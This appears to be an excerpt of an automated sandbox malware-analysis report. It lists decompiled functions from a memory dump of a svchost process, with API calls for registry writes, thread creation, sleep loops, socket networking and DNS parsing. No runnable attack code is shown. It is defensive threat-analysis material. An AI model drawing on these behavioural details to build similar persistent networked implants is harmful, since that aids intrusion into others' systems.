                                                                                                                                                                                                                                                          • Opcode ID: 1986a9e41c43eb34f473fceb462b583d8eb4d4567ed788cf03a4328257d43c49
                                                                                                                                                                                                                                                          • Instruction ID: 47acca0eb84ca6fe1e33d45648bc88bed4be747462007ed9b973c7a6eb3a8290
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1986a9e41c43eb34f473fceb462b583d8eb4d4567ed788cf03a4328257d43c49
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A115E76E10319FBDB01ABB4CD8AFDE7BACAF08658F144534F901E6144E778D64486A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 131453DC: GetEnvironmentVariableA.KERNELBASE(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453FC
                                                                                                                                                                                                                                                            • Part of subcall function 131453DC: PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 13145407
                                                                                                                                                                                                                                                            • Part of subcall function 131453DC: PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314541C
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 1314ACA4
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 1314ACB7
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 1314ACD3
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,-00000004,00000071,00000000,000F003F,?), ref: 1314ACFA
                                                                                                                                                                                                                                                          • RegSetValueExA.KERNELBASE(?,-00000004,00000070,00000000,00000001,?,00000104), ref: 1314AD36
                                                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 1314AD3F
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 1314AD4A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: PathSleep$AppendBackslashCloseEnvironmentOpenValueVariablelstrlenwnsprintf
                                                                                                                                                                                                                                                          • String ID: OzB
                                                                                                                                                                                                                                                          • API String ID: 3351196999-3380978223
                                                                                                                                                                                                                                                          • Opcode ID: 6922f7d9124d7a3246c10e81ec5a986fabe7229a4ae0cac61f5c8b55bced464a
                                                                                                                                                                                                                                                          • Instruction ID: 684fc2d828c6b53409bf90891137dc24cc90040d836e8d8021af879d67d54080
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6922f7d9124d7a3246c10e81ec5a986fabe7229a4ae0cac61f5c8b55bced464a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B113D75A40219FFEB14ABA4CD45FEE7B7CAB04708F200030E605B6185E7B5AA44DB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 265 13143212-13143240 GetCurrentThreadId CreateThread 266 13143242-13143244 265->266 267 13143249-1314325b CreateThread 265->267 268 131432d0-131432d4 266->268 267->266 269 1314325d-1314326b Sleep 267->269 270 13143273-1314327a 269->270 271 13143291-131432a4 CreateThread 270->271 272 1314327c-1314328f Sleep 270->272 271->266 273 131432a6-131432b8 CreateThread 271->273 272->270 272->271 273->266 274 131432ba-131432ce CreateThread 273->274 274->268
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 13143216
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,1314AC90,00000000,00000000,1315B698), ref: 1314323C
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,1314E335,00000000,00000000,1315B684), ref: 13143257
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4,?,?,1314340F), ref: 13143269
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 13143281
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,131460AA,00000000,00000000,1315B688), ref: 1314329F
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,131448A8,00000000,00000000,1315B68C), ref: 131432B4
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,1314CCE7,00000000,00000000,1315B694), ref: 131432C8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Thread$Create$Sleep$Current
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 773548574-0
                                                                                                                                                                                                                                                          • Opcode ID: d125012d3972e69df1683d7a917f2bca7c5ad83ee571bde9b23c96734ccfa98c
                                                                                                                                                                                                                                                          • Instruction ID: 8fd118986bc5cf1931c0d32a12ebccf3781935e800841fb4d7bc385c2169f3f6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d125012d3972e69df1683d7a917f2bca7c5ad83ee571bde9b23c96734ccfa98c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C11E1F074539A7FFA106B728CC4DB73AACFB92B8AB204935F421E2086D7649C005970
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 275 131504be-131504cd 276 131504d3-131504d7 275->276 277 131506d9-131506db 275->277 276->277 278 131504dd-131504f2 StrStrA 276->278 279 13150595-131505a2 StrStrA 278->279 280 131504f8-13150511 call 13145117 call 1315041e 278->280 282 131505a4-131505ae StrStrA 279->282 283 13150601-1315061a call 13144c8d call 1315041e 279->283 294 13150521-13150529 StrStrA 280->294 295 13150513-1315051c call 1315036b 280->295 282->283 284 131505b0-131505da call 13144ff9 call 13144f39 wnsprintfA 282->284 299 13150652-13150662 call 13150460 283->299 300 1315061c-13150620 283->300 297 131506d7-131506d8 284->297 306 131505e0-131505f0 call 131504be 284->306 294->297 298 1315052f-13150549 call 131504be 294->298 295->294 297->277 313 13150584-1315058a StrStrA 298->313 317 13150664-13150669 299->317 318 1315069a-131506a1 299->318 304 13150626-13150628 300->304 305 13150622-13150624 300->305 309 1315063d-13150648 call 1315036b 304->309 310 1315062a-13150638 call 131502dc 304->310 305->304 305->309 323 131505f3-131505fc call 13144c2f 306->323 322 1315064d 309->322 310->297 324 1315058c-13150593 313->324 325 1315054b-13150558 StrStrA 313->325 317->318 326 1315066b-13150672 317->326 320 131506a7-131506a9 318->320 321 131506a3-131506a5 318->321 329 131506c4-131506d3 320->329 330 131506ab-131506c2 call 13145117 320->330 321->320 321->329 322->297 323->297 324->323 327 1315055d-13150563 325->327 328 1315055a 325->328 332 13150674-13150676 326->332 333 13150678-1315067a 326->333 336 13150565-13150568 327->336 337 1315057a-1315057c 327->337 328->327 329->297 330->297 332->333 335 1315068a-13150698 call 13150227 332->335 334 1315067c-13150688 call 13150165 333->334 333->335 334->297 335->297 336->337 342 1315056a-13150577 call 131504be 336->342 337->324 343 1315057e-13150583 337->343 342->337 343->313
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,131414A4,?,00000000,00000000,?,?), ref: 131504EE
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,131414A4,00000000), ref: 13150525
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000001,131414A4), ref: 13150551
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(?,131414A4), ref: 13150584
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,131413B0), ref: 1315059E
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,131414A0), ref: 131505AA
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 131505CF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: wnsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 167729887-0
                                                                                                                                                                                                                                                          • Opcode ID: f18b3c8e464294533cbf1c960ebc8b5f2a193619ff2ec58d8373b0b9e7da2890
                                                                                                                                                                                                                                                          • Instruction ID: d40ca0711f350eafa9e00aa3d73cf48dafbe44b095db4083eda89839311fe2eb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f18b3c8e464294533cbf1c960ebc8b5f2a193619ff2ec58d8373b0b9e7da2890
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A61C035A01249BFDF014FA5CD40FAE3B6AAF87254F188039FC34AB290DB31D941DAA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetVersion.KERNEL32(00020000,76122E60,00000000), ref: 1314303C
                                                                                                                                                                                                                                                          • GetCommandLineA.KERNEL32(00000000,0000004A,00000000,0000003C), ref: 13143096
                                                                                                                                                                                                                                                          • StrStrIA.KERNELBASE(00000000,00000000,0000007B), ref: 131430B7
                                                                                                                                                                                                                                                          • inet_addr.WS2_32(00000000), ref: 131430E2
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CommandLineVersioninet_addr
                                                                                                                                                                                                                                                          • String ID: OzB
                                                                                                                                                                                                                                                          • API String ID: 4064751120-3380978223
                                                                                                                                                                                                                                                          • Opcode ID: d62363ce5baa6cb28e2e9e87307aa3534d67073ac274f1eb0d89fd005e112189
                                                                                                                                                                                                                                                          • Instruction ID: 935e66ac97efac0b4d3c00a972a79d93a54dab84a4458b0e7672ed538a15f6a2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d62363ce5baa6cb28e2e9e87307aa3534d67073ac274f1eb0d89fd005e112189
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B251A779740355BBE724ABA9CC8DF9A3B29EB82B18F14043DF145962C0EBB4A444CA65
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 422 13144bd5-13144beb HeapCreate 423 13144c23-13144c2e 422->423 424 13144bed-13144c03 HeapCreate 422->424 425 13144c05-13144c15 HeapCreate 424->425 426 13144c22 424->426 425->426 427 13144c17-13144c1d GetProcessHeap 425->427 426->423 427->426
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00000000,00000000,LoadLibraryExA,?,1314338F,00000000,00016B00,LoadLibraryExA,?), ref: 13144BE2
                                                                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,001E8480,1DCD6500,00016B00), ref: 13144BFA
                                                                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,001E8480,05F5E100), ref: 13144C0C
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 13144C17
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$Create$Process
                                                                                                                                                                                                                                                          • String ID: LoadLibraryExA
                                                                                                                                                                                                                                                          • API String ID: 846323464-2601528877
                                                                                                                                                                                                                                                          • Opcode ID: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
                                                                                                                                                                                                                                                          • Instruction ID: df309c537f147d9e7df735f2a449fb756469b5c2332ceeb35925c3edc0e0c3b5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90F0A7B1A012A56BCB04AF364EC0C4BAFDCE349358364AC3EF105D2504FB38884587B0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNELBASE(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453FC
                                                                                                                                                                                                                                                          • PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 13145407
                                                                                                                                                                                                                                                            • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                                                                                          • PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314541C
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Path$AppendBackslashEnvironmentVariablelstrlen
                                                                                                                                                                                                                                                          • String ID: C:\Windows\system32\regedit.exe$LoadLibraryExA
                                                                                                                                                                                                                                                          • API String ID: 3711117582-2466685467
                                                                                                                                                                                                                                                          • Opcode ID: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                                                                                          • Instruction ID: 40d1b3cb4e87c1594f7b209ae58ce819227e3fa9e4917f1197cc4b9cdaa05ffb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE09A76B4023067EA0077A58C4EFDA7A2CCB00A99B440030F902F92C0EB94E54286A9
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 435 1314cce7-1314cd12 call 13144ff4 438 1314cd14 435->438 439 1314cd15-1314cd2a Sleep call 13144d1b 438->439 441 1314cd2f-1314cd83 call 13144d1b call 13144eb1 * 2 call 131518db call 13144ec3 * 2 439->441 441->439 454 1314cd85-1314cd8a 441->454 455 1314cda6-1314cde2 select call 13144eb1 * 2 454->455 456 1314cd8c-1314cd9c call 1314bda1 454->456 465 1314ced8-1314ceed call 13144d1b 455->465 466 1314cde8-1314cdee 455->466 461 1314cda0-1314cda4 456->461 462 1314cd9e 456->462 461->455 461->456 462->461 473 1314cef3-1314cf00 465->473 474 1314cfcc-1314cfe3 call 13144ec3 * 2 465->474 466->465 467 1314cdf4-1314cdfa 466->467 467->465 469 1314ce00-1314ce0d 467->469 471 1314ce13-1314ce24 __WSAFDIsSet 469->471 472 1314cec9-1314ced2 469->472 471->472 475 1314ce2a-1314ce36 call 1314beaa 471->475 472->465 472->469 476 1314cf06-1314cf09 473->476 477 1314cfbd-1314cfc6 473->477 474->438 475->472 486 1314ce3c-1314ce3f 475->486 476->477 480 1314cf0f-1314cf14 476->480 477->473 477->474 483 1314cf16-1314cf24 call 1315186f 480->483 484 1314cf29-1314cf32 480->484 483->477 489 1314cf34-1314cf40 call 1314bc08 484->489 490 1314cf6b-1314cf87 call 13151bf3 call 1314c147 484->490 492 1314ce95-1314ce9b 486->492 493 1314ce41-1314ce45 486->493 501 1314cf42-1314cf4c call 131513df 489->501 502 1314cf4e-1314cf69 call 1314bd15 GetTickCount 489->502 518 1314cfb3 490->518 519 1314cf89-1314cf9b call 1314c0cc 490->519 492->472 497 1314ce9d-1314cea6 call 1314b1c8 492->497 498 1314ce47-1314ce4e 493->498 499 1314ce50-1314ce53 493->499 497->472 517 1314cea8-1314ceab 497->517 498->472 505 1314ce75-1314ce78 499->505 506 1314ce55-1314ce5e call 1314c081 499->506 501->483 502->477 508 1314ce89 505->508 509 1314ce7a-1314ce87 505->509 525 1314ce64-1314ce72 call 13144c2f 506->525 526 1314ce60-1314ce62 506->526 515 1314ce8b-1314ce93 call 1314b0e3 508->515 509->515 515->526 517->472 523 1314cead-1314ceb6 call 1314c081 517->523 521 1314cfb5-1314cfb8 call 13151be5 518->521 519->521 533 1314cf9d-1314cfae call 131513df call 1315186f 519->533 521->477 523->526 535 1314ceb8-1314cec6 call 13144c2f 523->535 525->505 526->472 533->518 535->472
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000001), ref: 1314CD17
                                                                                                                                                                                                                                                            • Part of subcall function 13144D1B: _memset.LIBCMT ref: 13144D39
                                                                                                                                                                                                                                                            • Part of subcall function 13144EB1: EnterCriticalSection.KERNEL32(00000000,1314E300,?,00000000,00000000,-00000004), ref: 13144EBC
                                                                                                                                                                                                                                                            • Part of subcall function 131518DB: EnterCriticalSection.KERNEL32(03601028,13161EF0,00000000,03601020,03601020,?,1314CD65,?,13161EF0,131616E8), ref: 131518EE
                                                                                                                                                                                                                                                            • Part of subcall function 131518DB: LeaveCriticalSection.KERNEL32(03601028,?,1314CD65,?), ref: 131518FB
                                                                                                                                                                                                                                                            • Part of subcall function 13144EC3: LeaveCriticalSection.KERNEL32(00000000,1314E31B,?,00000000,00000000,-00000004), ref: 13144ECE
                                                                                                                                                                                                                                                          • select.WS2_32(00000000,13161EF0,00000000,131616E8,?), ref: 1314CDC0
                                                                                                                                                                                                                                                          • __WSAFDIsSet.WS2_32(?,13161EF0), ref: 1314CE1D
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314CF60
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$CountSleepTick_memsetselect
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 462285117-0
                                                                                                                                                                                                                                                          • Opcode ID: a87d7cb2f4d1dcf16125fba73d78010f682d956b39e77f908425a8bdc16e74d6
                                                                                                                                                                                                                                                          • Instruction ID: 8757cdd0e8f0453b9c503d8fe05b6102780d6c7efeff28d5d7c0a94bffacdc5e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a87d7cb2f4d1dcf16125fba73d78010f682d956b39e77f908425a8bdc16e74d6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49818B75900316FFCF10DFA8D99099EBBF9EF05314B35093AE511B3294DB38AA518BA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 13144937
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,0000FA00,13144394,?,00000000,00000000), ref: 13144AB2
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(0000000A,?), ref: 13144B06
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000032,?,?,?), ref: 13144B25
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Sleep$CreateExitProcessThreadlstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 409902211-0
                                                                                                                                                                                                                                                          • Opcode ID: 075d2d43036dfda88634d388792c9ee31814f1ab77880507ee4d07b56597f8e7
                                                                                                                                                                                                                                                          • Instruction ID: 6d998106411ceb65381bfd4e6dc3443c2a6c4742902684d26abc5299e1fbab67
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 075d2d43036dfda88634d388792c9ee31814f1ab77880507ee4d07b56597f8e7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9710276A80360EFC715EF99C9C5E5A7BF8FB86758F34002AE505E7244EB78A440CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000000,76122E60,13143401), ref: 131432EF
                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000000), ref: 13143303
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalInitializeSection
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 32694325-0
                                                                                                                                                                                                                                                          • Opcode ID: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                                                                                          • Instruction ID: 36019c5d3645fadee2bcba3f0f1670733127cd8a2b67beb26c680348bd35dee3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CF054B1A443316BFF08EBFD6D667962E9C9B49364F244437F505D2184EFA48001DAF0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 13144EB1: EnterCriticalSection.KERNEL32(00000000,1314E300,?,00000000,00000000,-00000004), ref: 13144EBC
                                                                                                                                                                                                                                                            • Part of subcall function 13144EC3: LeaveCriticalSection.KERNEL32(00000000,1314E31B,?,00000000,00000000,-00000004), ref: 13144ECE
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000001), ref: 131460FF
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,-00000004,0000003F,00000000), ref: 1314614E
                                                                                                                                                                                                                                                            • Part of subcall function 1315182B: EnterCriticalSection.KERNEL32(03601028,00000000,00000000,761311A0,131461DD,00000000,00000000,000000FF), ref: 13151834
                                                                                                                                                                                                                                                            • Part of subcall function 1315182B: LeaveCriticalSection.KERNEL32(03601028), ref: 13151845
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 131461F6
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 1314620F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSectionSleep$EnterLeave
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 890587828-0
                                                                                                                                                                                                                                                          • Opcode ID: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                                                                                          • Instruction ID: aa9922c8d6f98b1bcbd01e6166526c1982ba4151100d3d07f382ebb813d1f31a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B313974A00320EFCF15ABA8CD91A6C7666AF82A3CF380A35E451761D5DF74A941C790
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • DnsExtractRecordsFromMessage_W.DNSAPI(?,0000000F,?), ref: 13143A20
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExtractFromMessage_Records
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 894924593-0
                                                                                                                                                                                                                                                          • Opcode ID: 4aaffa1ec976ba05866f146b18c5d58f70bcd048d94fc9edc9d59b786cbe60cb
                                                                                                                                                                                                                                                          • Instruction ID: 60d52c2c824cc0ac71183999dee07a1f2d1f8414627c33e6719cfd14f7d27d6a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aaffa1ec976ba05866f146b18c5d58f70bcd048d94fc9edc9d59b786cbe60cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CB11DB5900249EFCB11DF98CC809DEBBB9FF49304F25496AE954E7210E771AA60CF61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • htons.WS2_32(00000FA0), ref: 131462FC
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000002,00000011), ref: 13146317
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,13143375,00016B00,LoadLibraryExA,?), ref: 13146326
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLasthtonssocket
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3100113635-0
                                                                                                                                                                                                                                                          • Opcode ID: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
